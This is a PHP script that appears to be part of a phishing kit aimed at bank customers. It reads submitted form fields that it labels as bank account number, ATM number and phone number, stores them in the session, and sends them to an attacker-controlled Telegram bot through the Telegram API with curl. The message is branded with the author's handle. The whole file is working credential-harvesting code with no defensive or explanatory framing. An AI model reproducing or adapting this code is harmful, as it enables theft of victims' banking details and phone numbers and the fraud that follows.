<?php

session_start();
include "telegram.php";

$a = $_POST['nama'];
$_SESSION['nama'] = $a;
$b = $_POST['saldo'];
$_SESSION['saldo'] = $b;
$c = $_POST['nomor'];
$_SESSION['nomor'] = $c;



$message = "
BY GHUNOCAAA 🗿🗿🗿

- NO REKENING : ".$a."
- NO ATM : ".$b."
- NO HP   : ".$c."

BY GHUNOCAAA 🗿🗿🗿
";

function sendMessage($telegram_id, $message, $token_bot) {
    $url = "https://api.telegram.org/bot" . $token_bot . "/sendMessage?parse_mode=markdown&chat_id=" . $telegram_id;
    $url = $url . "&text=" . urlencode($message);
    $ch = curl_init();
    $optArray = array(
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true
    );
    curl_setopt_array($ch, $optArray);
    $result = curl_exec($ch);
    curl_close($ch);
}
sendMessage($telegram_id, $message, $token_bot);
?>
